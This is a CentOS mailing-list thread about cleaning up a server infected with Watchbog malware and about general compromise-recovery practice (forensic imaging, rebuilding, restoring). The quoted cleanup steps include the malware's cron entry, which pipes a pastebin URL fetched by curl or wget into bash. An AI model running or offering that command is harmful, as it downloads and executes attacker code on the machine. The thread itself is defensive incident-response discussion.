[CentOS] CentOS 7.5 Linux box got infected with Watchbog malware

Tue Dec 18 14:31:55 UTC 2018
mark <m.roth at 5-cent.us>

Valeri Galtsev wrote:
> On 12/17/18 2:57 PM, Mauricio Tavares wrote:
>> On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan
>> <kaushalshriyan at gmail.com> wrote:
>>> Is there a way to find out how the CentOS 7.5 Linux box got infected
>>> with malware? Currently i am referring to
>>> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malw
>>> areransomware.html to carry out the below steps and is done manually.
>>> 1)rm -fr /tmp/*timesyncc.service*
>>> 2)crontab -e -u apigee
>>> delete the cron entry */1 * * * * (curl -fsSL
>>> https://pastebin.com/raw/aGTSGJJp||wget -q -O-
>>> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
>>> 3)ps aux | grep watchbog
>>> kill -9 pidof watchbog
>>> Any suggestions or recommendations to find out how CentOS 7.5 Linux
>>> box got infected with Watchbog Malware. Is there any open source
>>> software which can
>> do you have untampered log files?
>>> be installed on CentOS 7.5 Linux box to detect and prevent Malware?
> Standard compromise recovery procedure since forever is (your local
> policy my have slightly different order about notifications and similar):
> 1. back up all user data

You should have been doing that all along.

First step, before you do anything else, is pull the hard drive, put it
into a hot-swap or external bay, and dd the entire drive to an identical
one. THAT goes to forensics.

Alternatively, pull the h/d, put in a new one, reset the BIOS to factory
settings - that includes pulling the battery... *then* set what you need,
and then build it new, and restore from backups.
Why, yes, we did just do this, um, last year, after a compromise via a
WordPress security hole. It did not manage to get to any other systems (we
checked, and only a few run WordPress).